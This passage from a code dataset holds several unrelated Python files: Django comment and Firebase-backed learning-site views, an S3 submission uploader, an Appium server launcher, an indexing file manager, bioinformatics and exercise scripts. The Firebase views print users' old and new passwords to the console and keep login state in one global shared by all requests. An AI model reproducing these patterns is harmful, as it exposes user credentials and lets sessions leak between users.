prev_now,\n cases_now,\n prev_7,\n prev_14,\n prev_21,\n prev_28,\n prev_56,\n cases_7,\n cases_14,\n cases_21,\n cases_28,\n cases_56,\n ),\n )\n\n ltla[\"Rt_exceed\"] = np.mean(rti > 1.0, axis=0)\n ltla = ltla.loc[\n :,\n ltla.columns.str.contains(\n \"(lad19cd|lad19nm$|prev|cases|Rt|popsize|geometry)\", regex=True\n ),\n ]\n ltla.to_file(\n os.path.join(\n config[\"output\"][\"results_dir\"], config[\"output\"][\"geopackage\"]\n ),\n driver=\"GPKG\",\n )\n","sub_path":"covid/tasks/summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":9457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"584637865","text":"import json\n# from django.shortcuts import render\nfrom django.contrib import messages\nfrom .models import Comment\nfrom .forms import CommentForm\nfrom django.views.generic import DetailView, DeleteView, FormView, View, RedirectView\nfrom django.core import serializers\nfrom ..core.models import ModelFormFailureHistory\nfrom django.urls import reverse_lazy, reverse\n# from django.shortcuts import get_object_or_404\nfrom django.views.generic.detail import SingleObjectMixin\nfrom django.http import HttpResponseForbidden, HttpResponseRedirect, Http404, HttpResponse\nfrom django.contrib.contenttypes.models import ContentType\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import authentication, permissions\n# Create your views here.\nfrom ..geba_analytics.mixins import ObjectViewMixin\n\n\nclass CommentActionMixin(object):\n # the fields that geba_auth will be able to type in the forms for CreateView\n # fields = ('published', 'title', 'body')\n\n @property\n def success_msg(self):\n return NotImplemented\n\n def form_valid(self, form):\n messages.info(self.request, self.success_msg)\n return super(CommentActionMixin, self).form_valid(form)\n\n def form_invalid(self, form):\n \"\"\"saves invalid form and model data for later reference.\"\"\"\n form_data = json.dumps(form.cleaned_data)\n model_data = serializers.serialize(\"json\",\n [form.instance])[1:-1]\n ModelFormFailureHistory.objects.create(form_data=form_data, model_data=model_data)\n return super(CommentActionMixin, self).form_invalid(form)\n\n\nclass CommentThreadGetView(ObjectViewMixin, DetailView):\n \"\"\"This view will be used to GET the detail data\"\"\"\n # success_msg = 'Comment Added!'\n model = Comment # generic views need to know which model to act upon\n template_name = 'comments/detail.html' # tells the view to use this template instead of it's default\n form_class = CommentForm\n\n def get(self, request, *args, **kwargs):\n # self.object = get_object_or_404(Comment, pk=kwargs['pk'])\n try:\n self.object = Comment.objects.get(pk=kwargs['pk'])\n except:\n response = HttpResponse(\"You do not have permission to do this.\")\n response.status_code = 403\n return response\n\n if not self.object.is_parent:\n # if the object isn't a parent, get the parent object\n self.object = self.object.parent\n\n # the original get defines self.object, this is required otherwise you get an error stating that there is no\n # attribute 'object' in this DetailView\n context = self.get_context_data(object=self.object)\n context['comment'] = self.object\n\n instance = self.object\n\n context = self.get_context_data(object=self.object)\n\n initial_data = {\n 'content_type': instance.content_type,\n 'object_id': instance.id,\n }\n comment_form = self.form_class(request.POST or None, initial=initial_data)\n\n 
context['comment_form'] = comment_form\n return self.render_to_response(context)\n\n def get_context_data(self, **kwargs):\n context = super(CommentThreadGetView, self).get_context_data(**kwargs)\n\n # context['object'] provides the instance for us\n context['comments'] = context['object']\n # context['comment_form'] = CommentForm()\n return context\n\n\nclass CommentThreadPostView(SingleObjectMixin, FormView):\n \"\"\"This view will be used to POST the detail data\n\n SingleObjectMixin = Provides a mechanism for looking up an object associated with the current HTTP request.\n i.e. using get_object()\n \"\"\"\n template_name = 'comments/detail.html' # tells the view to use this template instead of it's default\n form_class = CommentForm\n model = Comment # generic views need to know which model to act upon\n\n def post(self, request, *args, **kwargs):\n # comment_form = self.form_class(request.POST, request.FILES)\n if not request.user.is_authenticated:\n return HttpResponseForbidden()\n\n # self.object = self.get_object()\n try:\n self.object = Comment.objects.get(pk=kwargs['pk'])\n except:\n response = HttpResponse(\"You do not have permission to do this.\")\n response.status_code = 403\n return response\n\n if not self.object.is_parent:\n # if the object isn't a parent, get the parent object\n self.object = self.object.parent\n\n form = self.form_class(request.POST)\n if form.is_valid():\n c_type = form.cleaned_data.get(\"content_type\")\n content_type = ContentType.objects.get(model=c_type)\n object_id = form.cleaned_data.get(\"object_id\")\n content_data = form.cleaned_data.get(\"content\")\n parent_object = None\n try:\n parent_id = int(request.POST.get(\"parent_id\"))\n except:\n parent_id = None\n\n if parent_id:\n parent_qs = Comment.objects.filter(id=parent_id)\n if parent_qs.exists():\n parent_object = parent_qs.first() # get the first object in that queryset\n\n new_comment, created = Comment.objects.get_or_create(\n author=request.user,\n content_type=content_type,\n object_id=object_id,\n content=content_data,\n parent=parent_object\n )\n\n return super().post(request, *args, **kwargs)\n\n def get_success_url(self):\n # return HttpResponseRedirect(self.new_comment.content_object.get_absolute_url())\n return reverse('comments:thread', kwargs={'pk': self.object.pk})\n\n\nclass CommentThreadView(View):\n \"\"\"This view will be used to ensure that one is for GET and the other for POST\"\"\"\n\n def get(self, request, *args, **kwargs):\n view = CommentThreadGetView.as_view()\n return view(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n view = CommentThreadPostView.as_view()\n return view(request, *args, **kwargs)\n\n\nclass CommentDeleteView(CommentActionMixin, DeleteView):\n\n model = Comment\n success_msg = 'Comment Deleted!'\n success_url = reverse_lazy('blog:index')\n\n # make it so you have to be a super-geba_auth or staff to delete\n def dispatch(self, request, *args, **kwargs):\n # request = check_comment_rights(request)\n object = Comment.objects.get(pk=kwargs['pk'])\n\n if object.author != request.user:\n # messages.success(request, \"You do not have permission to view this!\")\n response = HttpResponse(\"You do not have permission to do this.\")\n response.status_code = 403\n return response\n\n return super(CommentDeleteView, self).dispatch(request, *args, **kwargs)\n\n def post(self, *args, **kwargs):\n try:\n object = Comment.objects.get(pk=kwargs['pk'])\n\n except:\n raise Http404\n\n parent_obj_url = 
object.content_object.get_absolute_url()\n object.delete()\n messages.success(self.request, \"Comment has been deleted.\")\n return HttpResponseRedirect(parent_obj_url)\n\n\nUP = 0\nDOWN = 1\n\n\nclass CommentLikeToggle(RedirectView):\n\n def get_redirect_url(self, *args, **kwargs):\n pk = self.kwargs.get(\"pk\")\n obj = Comment.objects.get(pk=pk)\n # obj = get_object_or_404(Comment, pk=pk)\n url_ = obj.get_absolute_url() # get the url of the project post\n user = self.request.user # get the geba_auth\n\n if user.is_authenticated:\n\n if obj.votes.exists(user.id, action=UP):\n obj.votes.delete(user.id)\n else:\n # upvote the object\n obj.votes.up(user.id)\n\n return url_\n\n\nclass CommentLikeToggleAjax(APIView):\n\n authentication_classes = (authentication.SessionAuthentication, )\n permission_classes = (permissions.IsAuthenticated, )\n\n def get(self, request, pk=None, format=None):\n pk = self.kwargs.get(\"pk\")\n\n # the get_object_or_404 won't work on the reply comments\n # obj = get_object_or_404(Comment, pk=pk)\n obj = Comment.objects.get(pk=pk)\n\n # url_ = obj.get_absolute_url() # get the url of the project post\n user = self.request.user # get the geba_auth\n updated = False\n liked = False\n\n if user.is_authenticated:\n\n if obj.votes.exists(user.id, action=UP):\n obj.votes.delete(user.id)\n liked = False\n else:\n # upvote the object\n obj.votes.up(user.id)\n\n liked = True\n\n updated = True\n\n data = {'updated': updated,\n 'liked': liked}\n\n return Response(data)\n\n\nclass CommentDislikeToggleAjax(APIView):\n\n authentication_classes = (authentication.SessionAuthentication, )\n permission_classes = (permissions.IsAuthenticated, )\n\n def get(self, request, pk=None, format=None):\n # slug = self.kwargs.get(\"slug\")\n pk = self.kwargs.get(\"pk\")\n\n # the get_object_or_404 won't work on the reply comments\n # obj = get_object_or_404(Comment, pk=pk)\n obj = Comment.objects.get(pk=pk)\n\n # url_ = obj.get_absolute_url() # get the url of the project post\n user = self.request.user # get the geba_auth\n updated = False\n disliked = False\n\n if user.is_authenticated:\n\n # check if the geba_auth is authenticated\n # check if the geba_auth has already voted on this object\n if obj.votes.exists(user.id, action=DOWN):\n obj.votes.delete(user.id)\n disliked = False\n else:\n # downvote the object\n obj.votes.down(user.id)\n disliked = True\n\n updated = True\n\n data = {'updated': updated,\n 'disliked': disliked}\n\n return Response(data)","sub_path":"geba_website/apps/comments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"78604219","text":"import datetime\nfrom django.shortcuts import render, HttpResponse, redirect, HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.http import HttpResponseRedirect\nfrom django.core.cache import cache\nimport traceback,random\n#from AkademiWeb.settings import db, auth, db_storage, DEBUG\nfrom google.cloud import firestore\n\n\n\ndef AnaSayfa(request):\n return render(request, 'Ayarlar.html')\n\ndef girisSayfasi(request):\n if auth.current_user is not None:\n return render(request, 'Anasayfa.html', {})\n else:\n if request.method == 'POST':\n user_email = request.POST['input_KullaniciEmail']\n user_password = request.POST['input_KullaniciSifresi']\n try:\n auth.current_user = auth.sign_in_with_email_and_password(email=user_email, password=user_password)\n logged_user_id = 
auth.current_user['localId']\n request.session['email'] = auth.current_user['email']\n request.session['id'] = auth.current_user['localId']\n\n user_data = db.collection(u'userData').document(u'{}'.format(logged_user_id)).get()\n user_account_data = user_data.to_dict()\n\n # The user's current data is cached on the session:\n avatar = db_storage.child('Avatar/{}'.format(user_account_data['userAvatar'])).get_url(\"\")\n request.session['avatar'] = avatar\n\n return redirect('anasayfa')\n\n except Exception as error:\n if DEBUG:\n traceback.print_exc()\n return render(request, 'GirisSayfasi.html', {'CVP': 'FALSE'})\n else:\n return render(request, 'GirisSayfasi.html', {})\n\n\ndef anasayfa(request):\n if auth.current_user is not None:\n doc_ref = db.collection(u'userData').document(u'{}'.format(request.session['id'])).get()\n doc = doc_ref.to_dict()\n request.session['username'] = doc['userFullname']\n\n room_a_ref = db.collection(u'userData').document(u'{}'.format(request.session['id'])).collection(\n u'statics').document(u'statics').get()\n lesson_data = room_a_ref.to_dict()\n request.session['lesson'] = lesson_data['complated_lessons']\n\n user_statistics = db.collection(u'userData').document(u'{}'.format(request.session['id'])).collection(\n u'statics').document(u'statics').get()\n user_tutorials = db.collection(u'userData').document(u'{}'.format(request.session['id'])).collection(\n u'tutorials').stream()\n\n user_data = db.collection(u'userData').document(u'{}'.format(request.session['id'])).get()\n user_account_data = user_data.to_dict()\n avatar = db_storage.child('Avatar/{}'.format(user_account_data['userAvatar'])).get_url(\"\")\n\n return render(request, 'Anasayfa.html', {'EgitimData': user_tutorials,'user_data':doc, 'user_stat':user_statistics.to_dict(),'avatar':avatar})\n else:\n if DEBUG:\n traceback.print_exc()\n return redirect('girisSayfasi')\n\n\ndef kullaniciCikis(request):\n if auth.current_user is not None:\n request.session['username'] = None\n request.session['id'] = None\n auth.current_user = None\n return redirect('girisSayfasi')\n else:\n return redirect('girisSayfasi')\n\n\n\ndef forum(request):\n #if auth.current_user is not None:\n\n forum_topics = db.collection(u'Forum').limit(12).get()\n user_ids = []\n for item in forum_topics:\n user_ids.append(item.to_dict()['user'])\n\n forum_avatars = []\n while user_ids:\n commentor_profile = db.collection(u'userData').document(u'{}'.format(user_ids[0])).get()\n commenter_avatar = db_storage.child('Avatar/{}'.format(commentor_profile.to_dict()['userAvatar'])).get_url(\"\")\n forum_avatars.append(commenter_avatar)\n user_ids.pop(0)\n\n forum_data = db.collection(u'Forum').limit(12).get()\n #Could be fetched ordered by date instead.\n\n return render(request,'Forum.html',{'forum_topic':forum_data,'forum_avatar':forum_avatars})\n #else:\n # return redirect('girisSayfasi')\n\ndef forumIcerik(request,forum_name):\n if auth.current_user is not None:\n commenter = db.collection(u'userData').document(u'{}'.format(auth.current_user['localId'])).get()\n if request.method == 'POST':\n print(\"method Post\")\n yorum = request.POST['yorum']\n try:\n print(\"trying\")\n data = {\n u'detail':yorum,\n u'date':datetime.datetime.now(),\n u'userName':commenter.to_dict()['userFullname'],\n u'user':auth.current_user['localId']\n }\n\n to_comment = db.collection(u'Forum').document(u'{}'.format(forum_name))\n comment = to_comment.collection(u'comments').document()\n comment.set(data)\n\n except Exception as err:\n print(err)\n yorumAvatars = []\n
comment_avatars = db.collection(u'Forum').document(u'{}'.format(forum_name)).collection(\n u'comments').order_by('date').get() # fetched the comments ordered by date.\n\n for item in comment_avatars:\n commentor_profile = db.collection(u'userData').document(u'{}'.format(item.to_dict()['user'])).get()\n commenter_avatar = db_storage.child('Avatar/{}'.format(commentor_profile.to_dict()['userAvatar'])).get_url(\"\")\n yorumAvatars.append(commenter_avatar)\n\n\n forum_content = db.collection(u'Forum').document(u'{}'.format(forum_name)).collection(\n u'comments').order_by('date').stream()\n\n\n forum_data = db.collection(u'Forum').document(u'{}'.format(forum_name)).get()\n user_data = db.collection(u'userData').document(u'{}'.format(forum_data.to_dict()['user'])).get()\n\n avatar = db_storage.child('Avatar/{}'.format(user_data.to_dict()['userAvatar'])).get_url(\"\") # The topic owner's avatar was fetched.\n\n\n\n context = {'forum_content':forum_content, 'forum_name':forum_name, 'user_data':user_data,\"topic_avatar\":avatar,'forum_data':forum_data,'comment_avatar':yorumAvatars}\n\n return render(request,'ForumContent.html',context)\n else:\n return redirect('girisSayfasi')\n\n\ndef forumYeniKonu(request):\n if auth.current_user is not None:\n if request.method == \"POST\":\n return render(request, 'ForumYeniKonu.html', {})\n else:\n if DEBUG:\n traceback.print_exc()\n return render(request, 'ForumYeniKonu.html', {})\n else:\n return redirect('girisSayfasi')\n\ndef notDefteri(request):\n if auth.current_user is not None:\n return render(request, 'NotDefteri.html', {})\n else:\n return redirect('girisSayfasi')\n\ndef ayarlar(request):\n if auth.current_user is not None:\n data = db.collection(u'userData').document(u'{}'.format(request.session['id'])).get()\n return render(request, 'Ayarlar.html', {'userData':data})\n else:\n return redirect('girisSayfasi')\n\n\ndef kodYaz(request):\n if auth.current_user is not None:\n return render(request, 'KodYaz.html', {})\n else:\n return redirect('girisSayfasi')\n\ndef reset_password(request):\n if auth.current_user is not None:\n\n try:\n\n oldPassword = request.POST['oldPass']\n newPassword = request.POST['newPassword']\n newConfirmPassword = request.POST['con-password']\n\n print('OLD Pass => ' + oldPassword)\n print('NEW Pass =>' + newPassword)\n print('NEW CONFIRM Pass => ' + newConfirmPassword)\n request.session['email'] = ['email']\n request.session['id'] = ['localId']\n return render(request, 'sifreSifirlama.html', {'onay': 'TRUE'})\n except:\n if DEBUG:\n traceback.print_exc()\n return render(request, 'sifreSifirlama.html', {'onay': 'FALSE'})\n else:\n return redirect('girisSayfasi')\n\n\n\ndef other_profiles(request,otherUser):\n if auth.current_user is not None:\n user_data = db.collection(u'userData').document(u'{}'.format(otherUser)).get()\n user_account_data = user_data.to_dict()\n\n\n avatar = db_storage.child('Avatar/{}'.format(otherUser)).get_url(\"\")\n user_statistics = db.collection(u'userData').document(u'{}'.format(otherUser)).collection(u'statics').document(u'statics').get()\n\n room_a_ref = db.collection(u'userData').document(u'{}'.format(otherUser)).collection(\n u'statics').document(u'statics').get()\n lesson_data = room_a_ref.to_dict()\n request.session['lesson'] = lesson_data['complated_lessons']\n\n\n user_tutorials = db.collection(u'userData').document(u'{}'.format(otherUser)).collection(\n u'tutorials').stream()\n\n if request.method == 'POST':\n if 'takipet' in request.POST:\n # Besides otherUser's document, we should also update our own user data here.
user_to_follow = db.collection(u'userData').document(u'{}'.format(otherUser))\n\n user_to_follow.update(\n {u'userFollowers': firestore.ArrayUnion([u'{}'.format(auth.current_user['localId'])])})\n\n\n return render(request, 'Anasayfa.html', {'EgitimData':user_tutorials,'user_data':user_account_data, 'user_stat': user_statistics.to_dict(), 'avatar':avatar})\n else:\n return redirect('girisSayfasi')\n\n\n\ndef news(request):\n if auth.current_user is not None:\n news_data = db.collection(u'News').limit(15).stream()\n\n return render(request, 'Bulten.html', {'newsData': news_data})\n else:\n return redirect('girisSayfasi')\n\n\ndef tutorial_dashboard(request):\n #if auth.current_user is not None:\n tutorial_names = db.collection(u'tutorial_data_browser').get()\n\n return render(request, 'Egitimler.html', {'lesson_names':tutorial_names})\n\n #else:\n # return redirect('girisSayfasi')\n\n\n\ndef tutorial_detail(request,lesson_names):\n if auth.current_user is not None:\n global ders_ismi\n ders_ismi = lesson_names\n tutorial_sidebar = db.collection(u'tutorial_data_browser').document(u'{}'.format(ders_ismi)).collection(u'tutorial_lessons4').order_by(u'no').stream()\n\n about_tutorial = db.collection(u'tutorial_data_browser').document(u'{}'.format(ders_ismi)).get()\n\n author_data = db.collection(u'userData').document(u'{}'.format(about_tutorial.to_dict()['Authorid'])).get()\n\n author_avatar = db_storage.child('Avatar/{}'.format(author_data.to_dict()['userAvatar'])).get_url(\"\")\n\n lst = [1,5,10,15,20,25,30,35,40,45,50,55,60,65,70,75,80,85,90,91,92,93,94,95,96,97,98,99,100]\n\n #if ders_ismi == \"BeautifulSoup4\":\n # tutorial_avatar = db.collection(u'v2TutorialData').document(u'Python').get()\n # avatar = db_storage.child('Avatar/{}'.format(tutorial_avatar.to_dict()['lessonAvatar'])).get_url(\"\")\n #else:\n # tutorial_avatar = db.collection(u'v2TutorialData').document(u'{}'.format(ders_ismi)).get()\n # avatar = db_storage.child('Avatar/{}'.format(tutorial_avatar.to_dict()['lessonAvatar'])).get_url(\"\")\n\n context = {'tutorial_lessons': tutorial_sidebar, 'about_tutorial':about_tutorial,'author_avatar':author_avatar,'zorluk':lst}\n\n\n\n return render(request, 'TutorialLesson.html',context)\n else:\n return redirect('girisSayfasi')\n\n\ndef gotoLesson(request,unitsNames):\n if auth.current_user is not None:\n\n tutorial_read_data = db.collection(u'tutorial_data_browser').document(u'{}'.format(ders_ismi)).collection(\n u'tutorial_lessons4').document(u'{}'.format(unitsNames))\n\n tutorial_read_data.update({u'userVisits': firestore.ArrayUnion([u'{}'.format(auth.current_user['localId'])])})\n\n\n tutorial_data = db.collection(u'tutorial_data_browser').document(u'{}'.format(ders_ismi)).collection(\n u'tutorial_lessons4').document(u'{}'.format(unitsNames)).get()\n\n user = db.collection('userData').document(u'{}'.format(auth.current_user['localId'])).get()\n\n if request.method == 'POST':\n yorum = request.POST['yorum']\n try:\n data = {\n u'Yorum':yorum,\n u'Tarih':datetime.datetime.now(),\n u'Yorum_yapan':user.to_dict()['userFullname'],\n u'Yorumid':auth.current_user['localId']\n }\n\n to_comment = db.collection(u'tutorial_data_browser').document(u'{}'.format(ders_ismi))\n comment = to_comment.collection(u'tutorial_lessons4').document(u'{}'.format(unitsNames))\n send_comment = comment.collection(u'Yorumlar').document()\n send_comment.set(data)\n\n except Exception as err:\n print(err)\n\n yorum_liste = []\n yorum_avats = []\n to_comments =
db.collection(u'tutorial_data_browser').document(u'{}'.format(ders_ismi))\n comments = to_comments.collection(u'tutorial_lessons4').document(u'{}'.format(unitsNames))\n take_comment = comments.collection(u'Yorumlar').get()\n\n for item in take_comment:\n avatar = db_storage.child('Avatar/{}'.format(item.to_dict()['Yorumid'])).get_url(\"\") # couldn't get the avatar to display..\n yorum_avats.append(avatar)\n yorum_liste.append(item.to_dict())\n\n\n return render(request, 'TutorialDetail.html',{'tutorial_data': tutorial_data,'yorumlar':yorum_liste, 'avatars':yorum_avats})\n\n else:\n return redirect('girisSayfasi')\n\n\ndef books(request):\n if auth.current_user is not None:\n books_data = db.collection('DocumentData').limit(30).stream()\n\n return render(request, 'Kitaplar.html', {'booksData': books_data})\n else:\n return redirect('girisSayfasi')\n\ndef coupons(request):\n if auth.current_user is not None:\n coupons_data = db.collection(\"BountyData\").limit(15).stream()\n return render(request, 'Kupon.html', {\"coupon_data\":coupons_data})\n else:\n return redirect('girisSayfasi')\n\n\n\ndef custom_page_not_found_view(request, exception):\n return render(request, \"404.html\", {})\n\ndef custom_error_view(request, exception=None):\n return render(request, \"500.html\", {})\n","sub_path":"DjangoWeb/AkademiApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"207696293","text":"import os\nimport boto3\nfrom pathlib import Path\nfrom datetime import datetime\nfrom dotenv import load_dotenv\n\n\ndef upload_submission(local_file: str, task: str):\n print(\"Starting submission at {}...\\n\".format(datetime.utcnow()))\n # env info should be in your env file\n BUCKET_NAME = os.getenv(\"BUCKET_NAME\") # you received it in your e-mail\n PARTICIPANT_ID = os.getenv(\"PARTICIPANT_ID\") # you received it in your e-mail\n AWS_ACCESS_KEY = os.getenv(\"AWS_ACCESS_KEY\") # you received it in your e-mail\n AWS_SECRET_KEY = os.getenv(\"AWS_SECRET_KEY\") # you received it in your e-mail\n\n # instantiate boto3 client\n s3_client = boto3.client(\n \"s3\",\n aws_access_key_id=AWS_ACCESS_KEY,\n aws_secret_access_key=AWS_SECRET_KEY,\n region_name=\"us-west-2\",\n )\n s3_file_name = os.path.basename(local_file)\n s3_file_path = \"{}/{}/{}\".format(task, PARTICIPANT_ID, s3_file_name) # it needs to be like e.g.
\"rec/id/*.json\"\n s3_client.upload_file(local_file, BUCKET_NAME, s3_file_path)\n print(\"\\nAll done at {}: see you, space cowboy!\".format(datetime.utcnow()))\n\n\ndef submission(outfile_path: Path, task: str) -> None:\n # load envs from env file\n load_dotenv(verbose=True, dotenv_path=\"upload.env\")\n EMAIL = os.getenv(\"EMAIL\") # the e-mail you used to sign up\n replaced_email = EMAIL.replace(\"@\", \"_\")\n current_datetime_ms = int(datetime.utcnow().timestamp() * 1000)\n parent = outfile_path.parent\n submit_file_path = parent / f\"{replaced_email}_{current_datetime_ms}.json\"\n outfile_path.rename(submit_file_path)\n upload_submission(local_file=str(submit_file_path), task=task)\n","sub_path":"experiments/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"238111089","text":"# -*- coding: utf-8 -*-\n__author__ = 'Luke'\n\nfrom common.redis_conn import *\nimport json\nimport os\n\n\ndef CheckAppiumServer(port):\n \"\"\" Check whether an Appium server is listening on the given port \"\"\"\n order = \"netstat -aon| findstr {}\".format(port)\n res = os.system(order)\n return res\n\n\ndef KillAppiumServer():\n \"\"\" Kill all Appium server processes \"\"\"\n order = \"taskkill /F /IM node.exe /t\"\n os.system(order)\n\n\ndef StartAppiumServer(port):\n \"\"\" Start an Appium server \"\"\"\n order = \"start appium -p {} \".format(port)\n os.popen(order)\n\n\ndef StartAppiumAdb(server_number):\n \"\"\" Start Appium servers and allocate adb ports for them \"\"\"\n base_port = 4723\n adb_port = 8200\n if server_number > 200:\n server_number = 200\n KillAppiumServer()\n redis_cache.delete(redis_appium_adb)\n while server_number:\n if CheckAppiumServer(base_port):\n server_number -= 1\n adb_port += 1\n StartAppiumServer(base_port)\n redis_cache.sadd(redis_appium_adb, json.dumps({\"appium\": base_port, \"adb\": adb_port}))\n base_port += 2\n\n\nif __name__ == '__main__':\n StartAppiumAdb(1)\n print(redis_cache.sinter(redis_appium_adb))\n","sub_path":"zalo/zalo_script/common/StartAppiumServer.py","file_name":"StartAppiumServer.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"454620367","text":"import os\nimport json\n\n\nclass FileManager:\n def __init__(self):\n if \"website\" not in os.listdir(os.getcwd()):\n os.mkdir(\"website\")\n if \"indexing\" not in os.listdir(os.getcwd()):\n os.mkdir(\"indexing\")\n if \"other\" not in os.listdir(os.getcwd()):\n os.mkdir(\"other\")\n\n if \"deep_save.json\" not in os.listdir(os.getcwd() + \"\\\\other\"):\n file_save = open(os.getcwd() + \"\\\\other\\\\deep_save.json\", \"w+\")\n file_save.close()\n\n @staticmethod\n def write_indexing(json_dict):\n alphabets_dict = {}\n for i in range(ord('a'), ord('z') + 1):\n alphabets_dict[chr(i)] = {}\n\n for word in json_dict:\n first_letter = word[0]\n if first_letter not in alphabets_dict:\n continue\n alphabets_dict[first_letter][word] = json_dict[word]\n\n new_alphabets_dict = alphabets_dict.copy()\n for letter in alphabets_dict:\n if len(alphabets_dict[letter]) < 200:\n continue\n list_alphabets = list(alphabets_dict[letter])\n word_counter = 0\n index = 0\n for word in list_alphabets:\n letter_index = letter + \"_\" + str(index)\n if letter_index not in new_alphabets_dict:\n new_alphabets_dict[letter_index] = {}\n new_alphabets_dict[letter_index][word] = alphabets_dict[letter][word]\n del(new_alphabets_dict[letter][word])\n word_counter += 1\n if word_counter > 200:\n index += 1\n word_counter = 0\n if
len(new_alphabets_dict[letter]) == 0:\n del(new_alphabets_dict[letter])\n alphabets_dict = new_alphabets_dict\n\n for letter in alphabets_dict:\n word_dict = alphabets_dict[letter]\n file_name = \"\\\\indexing\\\\indexing_\" + letter + \".json\"\n file_save = open(os.getcwd() + file_name, \"w+\")\n file_save.write(json.dumps(word_dict, indent=4, sort_keys=True))\n file_save.close()\n\n def read_indexing(self):\n indexing_dict = {}\n for file_name in os.listdir(os.getcwd() + \"\\\\indexing\"):\n file_read = open(os.getcwd() + \"\\\\indexing\\\\\" + file_name, \"r+\")\n indexing_dict.update(json.loads(file_read.read()))\n file_read.close()\n return indexing_dict\n\n def read_deep_save(self):\n file_read = open(os.getcwd() + \"\\\\other\\\\deep_save.json\", \"r+\")\n data = file_read.read()\n file_read.close()\n return data\n\n def write_deep_save(self, data):\n file_write = open(os.getcwd() + \"\\\\other\\\\deep_save.json\", \"w+\")\n file_write.write(data)\n file_write.close()\n\n def list_website_file(self):\n list_data = os.listdir(os.getcwd() + \"\\\\website\")\n return [os.getcwd() + \"\\\\website\\\\\" + data for data in list_data]\n\n def read_website_file(self, model, website):\n file_name = model.website_formatter(website).replace(\".\", \"_\").replace(\"/\", \"#\").replace(\":\", \"$\") + \".json\"\n file_write = open(os.getcwd() + \"\\\\website\\\\\" + file_name, \"r+\")\n data = file_write.read()\n file_write.close()\n return data\n\n def write_website_file(self, model, website, data):\n file_name = model.website_formatter(website).replace(\".\", \"_\").replace(\"/\", \"#\").replace(\":\", \"$\") + \".json\"\n file_write = open(os.getcwd() + \"\\\\website\\\\\" + file_name, \"w+\")\n file_write.write(json.dumps(data, indent=4, sort_keys=True))\n file_write.close()\n\n def delete_indeixng(self):\n file_list = os.listdir(os.getcwd() + \"\\\\indexing\")\n for file_name in file_list:\n os.remove(os.getcwd() + \"\\\\indexing\\\\\" + file_name)\n\n def get_website_deep_list(self):\n file_open = open(os.getcwd() + \"\\\\other\\\\weblist.txt\", \"r+\")\n list_website = []\n for website in file_open:\n list_website.append(website.strip())\n return list_website\n","sub_path":"File_Manager.py","file_name":"File_Manager.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"219194782","text":"#!/usr/bin/env python\n\n#script to reformat green-genes fasta file for UTAX compatibility\n\nimport sys\nfrom Bio import SeqIO\n\ndef dereplicate(input, output):\n seqs = {}\n in_file = open(input, 'rU')\n if input.endswith('.fa') or input.endswith('.fasta'):\n filetype = 'fasta'\n elif input.endswith('.fq') or input.endswith('.fastq'):\n filetype = 'fastq'\n else:\n print(\"Could not detect file type, must be FASTA or FASTQ\")\n sys.exit(1)\n for rec in SeqIO.parse(in_file, filetype):\n sequence = str(rec.seq)\n if sequence not in seqs:\n seqs[sequence] = rec.id\n with open(output, 'w') as out:\n for sequence in seqs:\n out.write('>'+seqs[sequence]+'\\n'+sequence+'\\n')\n\n\ndereplicate(sys.argv[1], sys.argv[2])\n\n\n","sub_path":"util/amptk-derep.py","file_name":"amptk-derep.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"349869403","text":"__author__ = 'Mohammad Yousuf Ali, aliyyousuf@gmail.com, fb.com/aliyyousuf'\n\n\n# Write a function named test_for_anagrams that receives two strings as parameters,\n# both
of which consist of alphabetic characters and returns True if the two strings\n# are anagrams, False otherwise. Two strings are anagrams if one string can be constructed\n# by rearranging the characters in the other string using all the characters in the\n# original string exactly once. For example, the strings \"Orchestra\" and \"Carthorse\"\n# are anagrams because each one can be constructed by rearranging the characters in the\n# other one using all the characters in one of them exactly once.\n# Note that capitalization does not matter here i.e. a lower case character can be\n# considered the same as an upper case character\n\n\ndef test_for_anagrams(s1,s2):\n s1,s2 = s1.lower(),s2.lower()\n D,D2 = {},{}\n for char in s1:\n D[char] = s1.count(char)\n for char in s2:\n D2[char] = s2.count(char)\n mis_match = 0\n for k,v in D.items():\n try:\n if D[k] != D2[k]:\n mis_match += 1\n except KeyError:\n return False\n\n if not mis_match and len(D) == len(D2):\n return True\n else:\n return False\n\n\nprint(test_for_anagrams('hello','hallo'))","sub_path":"UTAx-CSE1309X/Q4P4.py","file_name":"Q4P4.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"298472583","text":"import sys\r\nimport os\r\nimport csv\r\nimport numpy as np\r\nimport json\r\nfrom tqdm import tqdm\r\ncsv.field_size_limit(sys.maxsize)\r\ndef rle2bbox(rle, shape):\r\n '''\r\n from: https://www.kaggle.com/eigrad/convert-rle-to-bounding-box-x0-y0-x1-y1\r\n rle: run-length encoded image mask, as string\r\n shape: (height, width) of image on which RLE was produced\r\n Returns (x0, y0, x1, y1) tuple describing the bounding box of the rle mask\r\n\r\n Note on image vs np.array dimensions:\r\n\r\n np.array implies the `[y, x]` indexing order in terms of image dimensions,\r\n so the variable on `shape[0]` is `y`, and the variable on the `shape[1]` is `x`,\r\n hence the result would be correct (x0,y0,x1,y1) in terms of image dimensions\r\n for RLE-encoded indices of np.array (which are produced by widely used kernels\r\n and are used in most kaggle competitions datasets)\r\n '''\r\n\r\n a = np.fromiter(rle.split(), dtype=np.uint)\r\n a = a.reshape((-1, 